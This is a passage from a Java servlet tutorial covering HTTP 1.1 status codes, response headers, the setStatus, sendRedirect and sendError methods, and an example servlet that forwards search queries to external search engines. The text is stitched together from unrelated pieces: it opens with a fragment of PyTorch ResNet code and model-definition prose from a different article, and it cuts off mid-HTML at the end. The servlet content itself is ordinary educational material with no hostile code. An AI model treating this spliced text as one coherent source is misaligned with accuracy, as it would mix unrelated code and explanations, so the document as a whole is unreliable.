padding=3, bias=False) self.bn1 = nn.BatchNorm2d(64) self.relu = nn.ReLU() self.maxpool = nn.MaxPool2d(kernel_size=3, stride=2, padding=1) # Essentially the entire ResNet architecture are in these 4 lines below self.layer1 = self._make_layer( block, layers[0], intermediate_channels=64, stride=1 ) self.layer2 = self._make_layer( block, layers[1], intermediate_channels=128, stride=2 ) self.layer3 = self._make_layer( block, layers[2], intermediate_channels=256, stride=2 ) self.layer4 = self._make_layer( block, layers[3], intermediate_channels=512, stride=2 ) self.avgpool = nn.AdaptiveAvgPool2d((1, 1)) self.fc = nn.Linear(512 * 4, num_classes) def forward(self, x): x = self.conv1(x) x = self.bn1(x) x = self.relu(x) x = self.maxpool(x) x = self.layer1(x) x = self.layer2(x) x = self.layer3(x) x = self.layer4(x) x = self.avgpool(x) x = x.reshape(x.shape[0], -1) x = self.fc(x) return x def _make_layer(self, block, num_residual_blocks, intermediate_channels, stride): identity_downsample = None layers = [] # Either if we half the input space for ex, 56x56 -> 28x28 (stride=2), or channels changes # we need to adapt the Identity (skip connection) so it will be able to be added # to the layer that's ahead if stride != 1 or self.in_channels != intermediate_channels * 4: identity_downsample = nn.Sequential( nn.Conv2d( self.in_channels, intermediate_channels * 4, kernel_size=1, stride=stride, bias=False ), nn.BatchNorm2d(intermediate_channels * 4), ) layers.append( block(self.in_channels, intermediate_channels, identity_downsample, stride) ) # The expansion size is always 4 for ResNet 50,101,152 self.in_channels = intermediate_channels * 4 # For example for first resnet layer: 256 will be mapped to 64 as intermediate layer, # then finally back to 256. Hence no identity downsample is needed, since stride = 1, # and also same amount of channels. for i in range(num_residual_blocks - 1): layers.append(block(self.in_channels, intermediate_channels)) return nn.Sequential(*layers) Then define different versions of ResNet – For ResNet50 the layer sequence is [3, 4, 6, 3]. – For ResNet101 the layer sequence is [3, 4, 23, 3]. – For ResNet152 the layer sequence is [3, 8, 36, 3]. (refer the ‘Deep Residual Learning for Image Recognition‘ paper) def ResNet50(img_channel=3, num_classes=1000): return ResNet(block, [3, 4, 6, 3], img_channel, num_classes) def ResNet101(img_channel=3, num_classes=1000): return ResNet(block, [3, 4, 23, 3], img_channel, num_classes) def ResNet152(img_channel=3, num_classes=1000): return ResNet(block, [3, 8, 36, 3], img_channel, num_classes) Then write a small test code to check whether the model is working fine. def test(): net = ResNet101(img_channel=3, num_classes=1000) device = "cuda" if torch.cuda.is_available() else "cpu" y = net(torch.randn(4, 3, 224, 224)).to(device) print(y.size()) test() For the above test case the output should be: The entire code can be accessed here: [1]. Kaiming He, Xiangyu Zhang, Shaoqing Ren, Jian Sun: Deep Residual Learning for Image Recognition, Dec 2015, DOI: Thank you. Your suggestions and doubts are welcomed here in the comment section. Thank you for reading my article!You can also read this article on our Mobile APP
https://www.analyticsvidhya.com/blog/2021/06/build-resnet-from-scratch-with-python/
CC-MAIN-2021-25
refinedweb
1,368
50.73
This section is informative. The modules defined in this chapter are all new modules which were not part of the SMIL 2.1 specification. This section is informative. A SMIL 2.1 presentation has a lot of state that influences how the presentation runs. Or, to rephrase that in a procedural way, state that influences decisions that the SMIL scheduler makes. All this state is either implicit in the presentation (what nodes are active and how long into their duration they are, how many iterations of a repeat we have done, which nodes in an excl are paused because a higher priority node has preempted them, etc.), or completely external to the presentation (system tests and custom tests). This has the effect that the only control flow that the SMIL author has at his/her disposal is that which is built in to the language, unless the SMIL engine includes some scripting language component and a DOM interface to the document that the author can use to create more complex logic. The modules in this section provide a mechanism whereby the document author can create more complex control flow. In addition, the mechanisms that the SMIL BasicContentControl and CustomTestAttributes modules provide for testing values are limited: basically one can only test for predefined conditions being true (not for them being false) and there is a limited form of testing for multiple conditions with "and" being the only boolean operator. Application areas include things like quizzes, interactive adaptation of presentations to user preferences, computer-aided instruction and distant learning. This section is informative. The design of these modules was done after meeting with the W3C Backplane Group (part of the Hypertext Coordination Group) and various choices were influenced by the direction that group is taking. These modules therefore borrow heavily from work done by other W3C working groups:. This section is normative. This chapter defines the following modules: This section is informative. The SMIL 3.0 StateTest Module defined in this document is a new module which was not part of the SMIL 2.1 specification. This section is informative. The mechanisms that the BasicContentControl and CustomTestAttributes modules provide for testing values are limited: basically one can only test for predefined conditions being true (not for them being false) and by specifying multiple system test attributes an author has a way to simulate an and operator but that is all. This module introduces a generalized expr attribute that contains an expression. If the expression evaluates to false the element carrying the attribute is ignored. If the expression evaluates to true or if there is any error (this ranges from expression syntax errors and type errors to unavailability of the expression language engine) the element is treated normally. This section is normative. This section is informative. The SMIL 3.0 Language Profile specifies that XPath 1.0 is used as the therefore be used for more dynamic control whereas there is no such guarantee for the former. This section is normative. This module defines a set of functions for use in the expr attribute (possibly in addition to functions already defined in the expression language). The naming convention used for the functions is compatible with XPath 1.0 expressions, a profile using this module with another expression language must specify a transformation that needs to be applied to these function names to make them compatible with the expression language specified. This section is informative. Here is a SMIL 3.0 Language Profile example of an audio element that is only played if audio descriptions are off and the internet connection is faster than 1Mbps. Think of using it for playing background music only when this will not interfere too much with the real presentation: <audio src="background.mp3" expr="not(smil-audioDesc()) and smil-bitrate() > 1000000" /> can refer to in the context of the expr attribute, allowing elements to be rendered depending on author-defined values. A mechanism to change values in the data model is also included. The actual choice of the expression language is made in the language profile. The SMIL 3.0 Language Profile requires support for the XPath 1.0 expression language (but allows use of other languages as well). This section is normative. The UserState module defines the elements state, setvalue, newvalue and delvalue and the attributes language, ref, where, name and value. The state element sets global, document-wide, information for the other elements and attributes in this module. It selects the expression language to use and it may also be used to initialize the data model. Initialization of the data model may be done in-line, through the contents of the state element, or from an external source through the src attribute (defined in the Media Object Modules section). The state element accepts the language and src attributes. The setvalue element modifies the value of an item in the data model, similar to the corresponding element from XForms, but it takes its time behaviour from the SMIL ref element. Note that setvalue only modifies existing items, it is therefore an error to specify a non-existing item, depending on the expression language semantics. In case of such an error SMIL Timing semantics of the element are not affected. The setvalue supports all timing attributes, and participates normally in timing computations. The effect of setvalue happens when it becomes active. The setvalue element accepts the ref and value attributes. Both of these are required attributes. The newvalue element introduces a new, named, item into the data model. The newvalue supports all timing attributes, and participates normally in timing computations. The effect of newvalue happens at the beginning of its simple duration. Depending on the semantics of the expression language it may be an error to execute the newvalue element more than once. In case of such an error SMIL Timing semantics of the element are not affected. The. The language attribute selects the expression language to use. Its value should be a URI defining that language. The default value for this attribute is defined in the profile. SMIL implementations should allow expression language availability to be tested through the systemComponent attribute. The ref attribute indicates which item in the data model will be changed. The language used to specify this, plus any additional constraints on the attribute value, depend on the expression language used. This section is informative. The reason that newvalue has both a ref and a name attribute is that some languages, notably XPath 1.0, do not support ref referring to a non-existing named item in the data model. Therefore, name is used to give the name for the new item and ref and where specify where it is inserted. For expression languages without a hierarchical namespace ref and where should be omitted and only name is needed. This section is informative. For the SMIL 3.0 Language Profile the value of the ref attribute is an XPath expression that must evaluate. The name attribute specifies the name for the new data model item. This name must adhere to constraints set by the expression language used. The value attribute specifies the new value of the data model item referred to by the ref element. How the new value is specified in the value attribute is defined in the profile that includes this module. This specification also states whether only simple values are allowed or also expressions, and when those expressions are evaluated. If a statically-typed language is used as the data model language it is an error if the type of the value expression cannot be coerced to the type of the item referred to by the ref. This section is informative. Here is a SMIL 3.0 Language Profile example of a sequence of audio clips that remembers the last audio clip played, omitting the state declaration in the head for brevity: <seq> <audio src="chapter1.mp3" /> <setvalue ref="lastPlayed" value="1" /> <audio src="chapter2.mp3" /> <setvalue ref="lastPlayed" value="2" /> <audio src="chapter3.mp3" /> <setvalue ref="lastPlayed" value="3" /> </seq> Here is an extension of the previous example: not only is the last clip remembered but if this sequence is played again, later during the presentation, any audio clips played previously are skipped: <seq> > This section is informative. As stated before, the to be confused with the variable bindings in the expression context, another namespace that XPath has. These variable bindings are not supported through SMIL State. Therefore references to state elements are node-set expressions, not $name-style variable references. This usage allows for nested variables and more complex data structures than the flat namespace of the variable bindings provides. SMIL follows the lead of XForms here. The state element, of which at most one may occur, in the head section, should either be empty or contain a valid XML document. Therefore it should have at most one child element. Alternatively, if the src attribute is used to specify an external XML document the state element itself should be empty. The XPath context in which the expressions are evaluated is as follows: This context means that an expression of the form count has the same meaning as one of the form /data/count. Moreover, the XPath type conversion rules result in count + 1 in meaning the exact same things as number(/data/count) + 1. Here is the minimal state section that corresponds to the audio clip example above: <smil> <head> <state> <data xmlns=""> <lastPlayed>0</lastPlayed> </data> </state> ... formally specified in the profile. For ease of reading we include the relevant event defined in the SMIL 3.0 Language Profile here as well. The purpose of these events is to allow document authors to create documents (or sections of documents) that restart and re-evaluate conditional expressions whenever the values underlying the expressions have changed. UserState Module defined in this document is a new module which was not part of the SMIL 2.1 specification. This section is informative. This section introduces a method to save author defined state or to transmit it to an external server. This section is normative. The StateSubmission module defines two elements, submission and send, and the attributes submission, action, method, replace and target. The submission element carries the information needed to determine which parts of the data model should be sent, where it should be sent and what to do with any data returned. The ref attribute selects the portion of the data model to transmit and in case of XPath should be a node-set expression. The default is to transmit the whole data model (in case of xpath: "/"). The other attributes are explained below. The submission element accepts the ref, action, method, replace and target attributes. This section is informative This element was lifted straight from XForms, with the accompanying attributes. Support for asynchronous submission and the corresponding events are not needed because of SMIL's inherent parallelism. The send element causes the data model, or some part of the data model, to be submitted to server, saved to disk or transmitted externally through some other method. It does not specify any of this directly but contains only a reference to such submission instructions. The send supports all timing attributes, and participates normally in timing computations. The effect of send happens at the beginning of its simple duration. The send element accepts the submission attribute. The submission attribute is an IDREF that should refer to a submission element. A URL specifying where to transmit or save the nodeset. Which URLs are allowable must take security and privacy considerations into account. We need to follow the XForms lead here. Add some references. How to serialize and transmit the data. Allowed values are at least post and get but may be extended by the profile.(/)" restart="always" replace="none"/> ... <seq end="... some interactive end condition ..." > > In another presentation we could pick this value up again synchronously and use it. <smil> <head> <state> </state> <send xml: </head> <body> <par> ... <seq > <submit can use values from the data model to construct attribute values at runtime. The mechanism has been borrowed from XSLT attribute value templates. Substitution is triggered by using the construct {expression} anywhere inside an attribute value. The expression is evaluated, converted to a string value and substituted into the attribute value. This substitution happens when the element containing the attribute with the {expression} attribute becomes active. If any error occurs during the evaluation of the expression no substitution takes place, and the {expression} construct appears verbatim in the attribute value. If a profile includes this module it must list all attributes for which this substitution is allowed. It must use the same expression language for interpolation as the one used for StateTest expressions. This section is normative. This module does not define any new elements or attributes. This section is informative The SMIL 3.0 Language Profile includes the StateInterpolation module. It allows its use in the same set of attributes for which SMIL animation is allowed plus the src, href, clipBegin, clipEnd and clipBegin attributes. It disallows its use on the Timing and Synchronization attributes. Its use on other attributes is implementation-dependent. This section is informative. This SMIL 3.0 Language Profile example shows an icon corresponding to the current CPU on which the user views the presentation, or a default icon for an unknown CPU: <switch> <img src="cpu-icons/{smil-CPU()}.png" /> <img src="cpu-icons/unknown.png" /> </switch> This section is normative. Because StateInterpolation can also change attribute values its interaction with animation and DOM access needs to be defined, the so-called "sandwich model". StateInterpolation sits between DOM access and animation, i.e. DOM access will see the {expression} strings verbatim and it may set these values too. SMIL animation will operate on the value of the expression.
http://www.w3.org/TR/2008/CR-SMIL3-20080115/smil-state
CC-MAIN-2015-27
refinedweb
2,302
56.66
Issue with I2C... or is it me? - CoachAllen last edited by Greetings, I have been working with the LoPy4 and the MCP23017 IO Expander. I also have a Saleae Logic 4 that I have hooked up to see the protocol in action. I notice something strange though. I initialize using the following: from machine import I2C i2c = I2C(0, I2C.MASTER) i2c.writeto_mem(0x20, 0x00, 0xFF) The address set on the MCP23017 should be 0x20 as I have the A0 ... A2 pins all biased to ground. But in the Saleae Logic UI it's showing me that instead of writing to the slave at 0x20 it is instead 0x40. What do you think is causing this? - CoachAllen last edited by Okay I figured out it's me. In the settings for the Saleae Logic software I had it set to 8 bit addressing not 7 bit. Duh...
https://forum.pycom.io/topic/4933/issue-with-i2c-or-is-it-me
CC-MAIN-2019-43
refinedweb
147
84.88
06 May 2010 16:44 [Source: ICIS news] By Franco Capaldo LONDON (ICIS news)--Borealis will look to take advantage of import growth in ?xml:namespace> Mark Garrett said that Borealis had been producing at full capacity for the past four years at the 600,000 tonne/year polyethylene (PE) plant at Ruwais, Abu Dhabi, that was built in the first stage of its Borouge joint venture with Abu Dhabi National Oil Company (ADNOC). This meant that it had been unable to take advantage of China's growth in that period. However, with Borouge 2 due to start up this month at Ruwais - comprising a 1.5m tonne/year cracker, a 540,000 tonne/year PE plant and an 800,000 tonne/year polypropylene (PP) plant - Borealis was hoping to finally take advantage of demand growth in Asia. Despite a forecast growth in sales volumes, Garrett said Borealis was ready for possible difficulties in the second half of the year. “This year the two new projects [Borouge and Stenungsund, “Then of course we expect a significant change in Borealis’ company results next year,” he added. However, Garrett was wary of a dependence on “The world has become more dependent over the last two years as the western economies suffered and in some cases have fallen apart. Chinese growth is something that the rest of us have been living off and, if that would stop, I think you would see a very painful experience for the world,” he said. The CEO added that Borealis’s new 350,000 tonne/year low density polyethylene (LDPE) plant at “We have put the hydrocarbons in and we are pressurising it up. We are hoping to have pallets in the hand very soon; in the next week or two,” Garrett said. Additionally Garrett said that Borealis would remain cautious over the next six months and would be keeping an eye on “We see issues certainly going forward in However, Garrett said Borealis was in a fortunate position because geographically, the group’s plants focused on Scandinavia and Daniel Shook, Borealis’ chief financial officer (CFO), said the group had planned for certain scenarios. “We set out to make sure a very good liquidity position and over the last 18 months we have continued to term out the debt,” he said. As part of its strategy to further diversify its financing sources, Borealis seeked to raise up to €200m ($256.4m) in an inaugural bond issue for launch in “That gives us a lot of dry powder to weather what comes,” Shook added. Earlier on Thursday, Borealis reported a return to a first-quarter net profit of €54m, compared with a net loss of €56m recorded in the same period last year, as feedstock and polyolefin market prices continued to increase. (
http://www.icis.com/Articles/2010/05/06/9356633/borealis-to-take-advantage-of-china-import-growth-ceo.html
CC-MAIN-2014-23
refinedweb
464
60.08
When Threading Building Blocks Attack! This week (25-29 JUL 2011) I'm lecturing at the UPCRC UIUC Summer School on Multicore Programming. I like teaching parallel programming and I live near the UIUC campus, so it's convenient for me. Overall I have a good time and often learn some things from the students. As an example, I found the following oddity about using lambdas within Intel® Threading Building Blocks (TBB). One of the problems that I provided for the TBB hands-on lab was Prim's Algorithm to compute a Minimum Spanning Tree (MST) on a given undirected, weighted graph. I know this makes a good coding exercise since a TBB solution is given as Example 10-10 in The Art of Concurrency. Written in 2008, that code uses the imperative method of creating a new class for the parallel_reduce algorithm. Today, we have the possibility of using lambdas instead. But, I'm getting ahead of myself. A quick review of what is involved in Prim's Algorithm is in order. After choosing some arbitrary node to be in the partial MST, new graph nodes are added, one at a time per iteration of a loop. The first part of the processing within the loop body that adds a node is a determination of that node that is not currently part of the partial MST and is closest (connected by an edge of least weight) to some node that is in the MST. The smallest weight of nodes not part of the MST are held in a separate vector and are updated after a new node is added. Thus, to find the closest edge, a search for the index of the minimum value in the vector is done. This search can be done in parallel and involves a reduction operation. The fact is that the computation to find the index of the minimum element in a vector is the prototypical example for illustrating how to use the TBB parallel_reduce() algorithm. Two of the students that were working on the problem expected that this example should be easily translatable to using the lambda notation from the serial Prim's Algorithm code. So did I. What we didn't expect are the rigmarole that was required to actually carry out such a simple sounding translation. To make this blog more worthwhile than me just ranting about the vagaries of TBB, please allow me to take an instructional bent to the remainder. Here is the original serial code of interest that finds the minimum value in the minDist vector, but returns the location (index) of that element in nodeIdx. (Note: a negative value in minDist is used to signal that the node has been previously added to the MST.) min = FLT_MAX; for (j = 1; j < N; j++) { if (0 <= minDist[j] && minDist[j] < min) { min = minDist[j]; nodeIdx = j; } } And here is the TBB class I've used to perform this minimum index reduction computation through a call to parallel_reduce(): class NearestNeighbor { const float *const NNDist; public: float minDistVal; int minDistIndex; void operator()(const blocked_range<int>& r) { for(int j = r.begin(); j != r.end(); ++j) { if (0 <= NNDist[j] && NNDist[j] < minDistVal) { minDistVal = NNDist[j]; minDistIndex = j; } } } void join( const NearestNeighbor& y ) { if (y.minDistVal < minDistVal) { minDistVal = y.minDistVal; minDistIndex = y.minDistIndex; } } NearestNeighbor( const float *nnd ) : NNDist(nnd), minDistVal(FLT_MAX), minDistIndex(-1) {} NearestNeighbor( NearestNeighbor& x, split ) : NNDist(x.NNDist), minDistVal(FLT_MAX), minDistIndex(-1) {} }; From the code above, we can extract the desired index from the minDistIndex member of the NearestNeighbor object. The lambda version of parallel_reduce() returns a value. During my lecture on Threading Building Blocks, I showed an example of parallel_reduce() that utilizes a more traditional summing reduction to compute an approximation of pi through numerical integration. Using that code as a template, the students transformed those computations and fields and parameters into code that should return the index of the minimum value. And so, we thought that this should work... nodeIdx = parallel_reduce( blocked_range(1, N), int(-1), [&](blocked_range& r, int local_idx ) -> int { int minDistVal = FLT_MAX; local_idx = -1; for (size_t i = r.begin(); i < r.end(); ++i) { if (0 <= NNDist[j] && NNDist[j] < minDistVal) { minDistVal = NNDist[j]; local_idx = j; } } return local_idx; }, [&] ( int idx1, int idx2 ) -> int { if (NNdist[idx1] <= NNdist[idx2]) return idx1; else return idx2; } ); Using Intel® C++ Composer XE 2011 within Microsoft Visual Studio 2010, there was an error on the join lambda. The message kept saying that we were only allowed to have a single return in the lambda. Interesting, but easily fixed by adding a local variable to hold the index to be returned (assigned in the if-then-else statement) and then the single return statement. Unfortunately, that didn't get rid of the error. After cogitating on the error message, we decided that maybe it was telling us that not only were we restricted to a single return statement in the body of the lambda, but that the only thing that was allowed in the lambda was that single return statement. (Surely that couldn't be right. I mean, look at the body lambda. That got more than one line of code. And the imperative join method uses more than one line of code.) Thus, we tried this version of the join method... [&]( int idx1, int idx2 ) -> int { return (NNdist[idx1] <= NNdist[idx2]) ? idx1 : idx2; } And that worked. Is this "feature" of TBB documented? (I haven't yet found it, if it is.) Was it some odd restriction that is only in force within the C++ Composer XE 2011 version of the library? Or is it just my own ignorance of C++ and the lambda features being added to the C++0X standard? It does make an odd kind of sense, I suppose. If you've only got two things that can be considered for your reduction operation, it should be an easy matter of picking one or the other or combining the two values into a single value that can be returned. Who would need more than one line to do that? Even so, it was just a weird thing to run up against. (Disclaimer: I've recreated some of the code segments above from memory and witness statements provided after the fact. The code is provided for illustration purposes only and may not compile or execute correctly without modification.) Update (04 AUG 11): Modified the return value as pointed out in the first comment. My memory isn't what it used to be.
https://software.intel.com/zh-cn/blogs/2011/07/28/when-threading-building-blocks-attack?language=en
CC-MAIN-2018-09
refinedweb
1,082
62.17
A Fast Introduction to Basic Servlet Programming - Oct 25, 2002 - The World The status line consists of the HTTP version (HTTP/1.1 in the example above), a status code (an integer; 200 in the example), and a very short message corresponding to the status code (OK in the example). In most cases, all of the headers are optional except for Content-Type, which specifies the MIME type of the document that follows. Although most responses contain a document, some don't. For example, responses to HEAD requests should never include a document, and a variety of status codes essentially indicate failure and either don't include a document or include only a short error-message document. Servlets can perform a variety of important tasks by manipulating the status line and the response headers. For example, they can forward the user to other sites; indicate that the attached document is an image, Adobe Acrobat file, or HTML file; tell the user that a password is required to access the document; and so forth. This section briefly summarizes the most important status codes and what can be accomplished with them; see Chapter 6 of Core Servlets and JavaServer Pages (in PDF at) for more details. The following section discusses the response headers. Specifying Status Codes As just described, the HTTP response status line consists of an HTTP version, a status code, and an associated message. Since the message is directly associated with the status code and the HTTP version is determined by the server, all a servlet needs to do is to set the status code. A code of 200 is set automatically, so servlets don't usually need to specify a status code at all. When they do set a code, they do so with the setStatus method of HttpServletResponse. If your response includes a special status code and a document, be sure to call setStatus before actually returning any of the content with the PrintWriter. That's because an HTTP response consists of the status line, one or more headers, a blank line, and the actual document, in that order. As discussed in Section 2.2 (Basic Servlet Structure), servlets do not necessarily buffer the document (version 2.1 servlets never do so), so you have to either set the status code before first using the PrintWriter or carefully check that the buffer hasn't been flushed and content actually sent to the browser. Core Approach Set status codes before sending any document content to the client. The setStatus method takes an int (the status code) as an argument, but instead of using explicit numbers, for clarity and reliability use the constants defined in HttpServletResponse. The name of each constant is derived from the standard HTTP 1.1 message for each constant, all upper case with a prefix of SC (for Status Code) and spaces changed to underscores. Thus, since the message for 404 is Not Found, the equivalent constant in HttpServletResponse is SC_NOT_FOUND. There are two exceptions, however. The constant for code 302 is derived from the HTTP 1.0 message (Moved Temporarily), not the HTTP 1.1 message (Found), and the constant for code 307 (Temporary Redirect) is missing altogether. Although the general method of setting status codes is simply to call response.setStatus(int), there are two common cases where a shortcut method in HttpServletResponse is provided. Just be aware that both of these methods throw IOException, whereas setStatus does not. public void sendError(int code, String message) The sendError method sends a status code (usually 404) along with a short message that is automatically formatted inside an HTML document and sent to the client. public void sendRedirect(String url) The sendRedirect method generates a 302 response along with a Location header giving the URL of the new document. With servlets version 2.1, this must be an absolute URL. In version 2.2 and 2.3, either an absolute or a relative URL is permitted; the system automatically translates relative URLs into absolute ones before putting them in the Location header. Setting a status code does not necessarily mean that you don't need to return a document. For example, although most servers automatically generate a small File Not Found message for 404 responses, a servlet might want to customize this response. Again, remember that if you do send output, you have to call setStatus or sendError first. HTTP 1.1 Status Codes In this subsection I describe the most important status codes available for use in servlets talking to HTTP 1.1 clients, along with the standard message associated with each code. A good understanding of these codes can dramatically increase the capabilities of your servlets, so you should at least skim the descriptions to see what options are at your disposal. You can come back for details when you are ready to make use of some of the capabilities. The complete HTTP 1.1 specification is given in RFC 2616. In general, you can access RFCs online by going to and following the links to the latest RFC archive sites, but since this one came from the World Wide Web Consortium, you can just go to. Codes that are new in HTTP 1.1 are noted, since some browsers support only HTTP 1.0. You should only send the new codes to clients that support HTTP 1.1, as verified by checking request.getRequestProtocol. The rest of this section describes the specific status codes available in HTTP 1.1. These codes fall into five general categories: 100199 Codes in the 100s are informational, indicating that the client should respond with some other action. 200299 Values in the 200s signify that the request was successful. 300399 Values in the 300s are used for files that have moved and usually include a Location header indicating the new address. 400499 Values in the 400s indicate an error by the client. 500599 Codes in the 500s signify an error by the server. The constants in HttpServletResponse that represent the various codes are derived from the standard messages associated with the codes. In servlets, you usually refer to status codes only by means of these constants. For example, you would use response.setStatus(response.SC_NO_CONTENT) rather than response.setStatus(204), since the latter is unclear to readers and is prone to typographical errors. However, you should note that servers are allowed to vary the messages slightly, and clients pay attention only to the numeric value. So, for example, you might see a server return a status line of HTTP/1.1 200 Document Fol_lows instead of HTTP/1.1 200 OK. 100 (Continue) If the server receives an Expect request header with a value of 100-con_tinue, it means that the client is asking if it can send an attached document in a follow-up request. In such a case, the server should either respond with status 100 (SC_CONTINUE) to tell the client to go ahead or use 417 (Expectation Failed) to tell the browser it won't accept the document. This status code is new in HTTP 1.1. 200 (OK) A value of 200 (SC_OK) means that everything is fine. The document follows for GET and POST requests. This status is the default for servlets; if you don't use setStatus, you'll get 200. 202 (Accepted) A value of 202 (SC_ACCEPTED) tells the client that the request is being acted upon, but processing is not yet complete. 204 (No Content) A status code of 204 (SC_NO_CONTENT) stipulates that the browser should continue to display the previous document because no new document is available.. This status code instructs browsers to clear form fields. It is new in HTTP 1.1. 301 (Moved Permanently) The 301 (SC_MOVED_PERMANENTLY) status indicates that the requested document is elsewhere; the new URL for the document is given in the Location response header. Browsers should automatically follow the link to the new URL. 302 (Found) This value is similar to 301, except that in principle the URL given by the Location header should be interpreted as a temporary replacement, not a permanent one. In practice, most browsers treat 301 and 302 identically. Note: In HTTP 1.0, the message was Moved Temp_orarily instead of Found, and the constant in HttpServletRe_sponse is SC_MOVED_TEMPORARILY, not the expected SC_FOUND. Core Note The constant representing 302 is SC_MOVED_TEMPORARILY, not SC_FOUND. Status code 302 is useful because browsers automatically follow the reference to the new URL given in the Location response header. It is so useful, in fact, that there is a special method for it, sendRedirect. Using response.sendRedirect(url) has a couple of advantages over using response.setStatus(response.SC_MOVED_TEMPORARILY) and response.setHeader("Location", url). First, it is shorter and easier. Second, with sendRedirect, the servlet automatically builds a page containing the link to show to older browsers that don't automatically follow redirects. Finally, with version 2.2 and 2.3 of servlets, sendRedirect can handle relative URLs, automatically translating them into absolute ones. Technically, browsers are only supposed to automatically follow the redirection if the original request was GET. For details, see the discussion of the 307 status code. 303 (See Other) The 303 (SC_SEE_OTHER) status is similar to 301 and 302, except that if the original request was POST, the new document (given in the Location header) should be retrieved with GET. This code is new in HTTP 1.1. 304 (Not Modified) When a client has a cached document, it can perform a conditional request by supplying an If-Modified-Since header to indicate that it wants the document only if it has been changed since the specified date. A value of 304 (SC_NOT_MODIFIED). For an example, see Section 2.8 of Core Servlets and JavaServer Pages. 307 (Temporary Redirect) The rules for how a browser should handle a 307 status are identical to those for 302. The 307 value was added to HTTP 1.1 since many browsers erroneously follow the redirection on a 302 response even if the original message is a POST. Browsers are supposed to follow the redirection of a POST request only when they receive a 303 response status. This new status is intended to be unambiguously clear: follow redirected GET and POST requests in the case of 303 responses; follow redirected GET but not POST requests in the case of 307 responses. Note: For some reason there is no constant in HttpServletResponse corresponding to this status code, so you have to use 307 explicitly. This status code is new in HTTP 1.1. 400 (Bad Request) A 400 (SC_BAD_REQUEST) status indicates bad syntax in the client request. 401 (Unauthorized) A value of 401 (SC_UNAUTHORIZED) signifies that the client tried to access a password-protected page without proper identifying information in the Authorization header. The response must include a WWW-Authenticate header._Status is that, with sendError, the server automatically generates an error page showing the error message. 404 errors need not merely say "Sorry, the page cannot be found." Instead, they can give information on why the page couldn't be found or supply search boxes or alternative places to look. The sites at and have particularly good examples of useful error pages. In fact, there is an entire site dedicated to the good, the bad, the ugly, and the bizarre in 404 error messages:. I find particularly amusing. Unfortunately, however, the default behavior of Internet Explorer 5 is to ignore the error page you send back and to display its own, even though doing so contradicts the HTTP specification. To turn off this setting, you can. Core Warning By default, Internet Explorer version 5 improperly ignores server-generated error pages. To make matters worse, some versions of Tomcat 3 fail to properly handle strings that are passed to sendError. So, if you are using Tomcat 3, you may need to generate 404 error messages by hand. Fortunately, it is relatively uncommon for individual servlets to build their own 404 error pages. A more common approach is to set up error pages for each Web application; see Section 5.8 (Designating Pages to Handle Errors) for details. Tomcat correctly handles these pages. Core Warning Some versions of Tomcat 3.x fail to properly display strings that are supplied to sendError. 405 (Method Not Allowed) A 405 (SC_METHOD_NOT_ALLOWED) value indicates that the request method (GET, POST, HEAD, PUT, DELETE, etc.) was not allowed for this particular resource. This status code is new in HTTP 1.1. 415 (Unsupported Media Type) A value of 415 (SC_UNSUPPORTED_MEDIA_TYPE) means that the request had an attached document of a type the server doesn't know how to handle. This status code is new in HTTP 1.1. 417 (Expectation Failed) If the server receives an Expect request header with a value of 100-con_tinue, it means that the client is asking. It often results from CGI programs or (heaven forbid!) servlets that crash or return improperly formatted headers. 501 (Not Implemented) The 501 (SC_NOT_IMPLEMENTED) status notifies the client that the server doesn't support the functionality to fulfill the request. It is used, for example, when the client issues a command like PUT that the server doesn't support. 503 (Service Unavailable) A status code of 503 (SC_SERVICE_UNAVAILABLE) signifies that the server cannot respond because of maintenance or overloading. For example, a servlet might return this header if some thread or database connection pool is currently full. The server can supply a Retry-After header to tell the client when to try again. 505 (HTTP Version Not Supported) The 505 (SC_HTTP_VERSION_NOT_SUPPORTED) code means that the server doesn't support the version of HTTP named in the request line. This status code is new in HTTP 1.1. A Front End to Various Search Engines Listing 2.12 presents an example that makes use of the two most common status codes other than 200 (OK): 302 (Found) and 404 (Not Found). The 302 code is set by the shorthand sendRedirect method of HttpServletResponse, and 404 is specified by sendError. In this application, an HTML form (see Figure 210 and the source code in Listing 2.14) first displays a page that lets the user specify a search string, the number of results to show per page, and the search engine to use. When the form is submitted, the servlet extracts those three parameters, constructs a URL with the parameters embedded in a way appropriate to the search engine selected (see the SearchSpec class of Listing 2.13), and redirects the user to that URL (see Figure 211). If the user fails to choose a search engine or specify search terms, an error page informs the client of this fact (but see warnings under the 404 status code in the previous subsection). Listing 2.12 SearchEngines.java package moreservlets; import java.io.*; import javax.servlet.*; import javax.servlet.http.*; import java.net.*; /** Servlet that takes a search string, number of results per * page, and a search engine name, sending the query to * that search engine. Illustrates manipulating * the response status line. It sends a 302 response * (via sendRedirect) if it gets a known search engine, * and sends a 404 response (via sendError) otherwise. */ public class SearchEngines extends HttpServlet { public void doGet(HttpServletRequest request, HttpServletResponse response) throws ServletException, IOException { String searchString = request.getParameter("searchString"); if ((searchString == null) || (searchString.length() == 0)) { reportProblem(response, "Missing search string."); return; } // The URLEncoder changes spaces to "+" signs and other // non-alphanumeric characters to "%XY", where XY is the // hex value of the ASCII (or ISO Latin-1) character. // Browsers always URL-encode form values, so the // getParameter method decodes automatically. But since // we're just passing this on to another server, we need to // re-encode it. searchString = URLEncoder.encode(searchString); String numResults = request.getParameter("numResults"); if ((numResults == null) || (numResults.equals("0")) || (numResults.length() == 0)) { numResults = "10"; } String searchEngine = request.getParameter("searchEngine"); if (searchEngine == null) { reportProblem(response, "Missing search engine name."); return; }; } } reportProblem(response, "Unrecognized search engine."); } private void reportProblem(HttpServletResponse response, String message) throws IOException { response.sendError(response.SC_NOT_FOUND, "<H2>" + message + "</H2>"); } public void doPost(HttpServletRequest request, HttpServletResponse response) throws ServletException, IOException { doGet(request, response); } } Listing 2.13 SearchSpec.java package moreservlets; /** Small class that encapsulates how to construct a * search string for a particular search engine. */ public class SearchSpec { private String name, baseURL, numResultsSuffix; private static SearchSpec[] commonSpecs = { new SearchSpec ("google", "", "&num="), new SearchSpec ("altavista", "", "&nbq="), new SearchSpec ("lycos", "" + "pursuit?query=", "); } } Figure 210 Front end to the SearchEngines servlet. See Listing 2.14 for the HTML source code. Figure 211 Result of the SearchEngines servlet when the form of Figure 210 is submitted. Figure 212 Result of the SearchEngines servlet when a form that has no search string is submitted. This result is for JRun 3.1; results can vary slightly among servers and will omit the "Missing search string" message in most Tomcat versions. Listing 2.14 SearchEngines.html <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"> <HTML> <HEAD> <TITLE>Searching the Web</TITLE> </HEAD> <BODY BGCOLOR="#FDF5E6"> <H1 